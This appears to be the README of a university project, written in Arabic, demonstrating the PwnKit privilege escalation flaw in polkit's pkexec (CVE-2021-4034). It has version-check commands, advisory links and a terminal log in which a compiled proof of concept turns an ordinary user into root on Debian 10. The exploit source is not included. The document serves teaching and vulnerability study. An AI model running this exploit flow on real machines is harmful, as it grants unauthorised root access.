
دورة جامعية حول ثغرات البرمجيات وسبل التخفيف منها، لعرض كيفية استغلال هذه الثغرة ومعالجتها.
مشروع جامعي حول الثغرات البرمجية والتخفيف منها، لإظهار الاستغلال والمعالجة الناتجة عن هذه الثغرة. استخدمنا في هذه التجربة نظام Ubunto الإصدار 16.04 LTS، بالإضافة إلى Debian 10.1.0، وهو ما سيتم عرضه في التجربة. كان إعداد البيئة أمرًا ضروريًا، حيث تحتاج دائمًا إلى التحقق من الإصدار الذي تعمل عليه للتأكد من كونه معرضًا للثغرة أم لا. الأوامر المستخدمة للتحقق: dpkg -l | grep polkit, pkexec --version
PoC لـ PwnKit: ثغرة تصعيد الامتيازات المحلية في pkexec الخاص بـ polkit (CVE-2021-4034)
https://seclists.org/oss-sec/2022/q1/80
https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034
تم التحقق على Debian 10 وUbunto 16.0.4
user@debian:~$ grep PRETTY /etc/os-release
PRETTY_NAME="Debian GNU/Linux 10 (buster)"
user@debian:~$ id
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
user@debian:~$ gcc cve-2021-4034-poc.c -o cve-2021-4034-poc
user@debian:~$ ./cve-2021-4034-poc
# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),1000(user)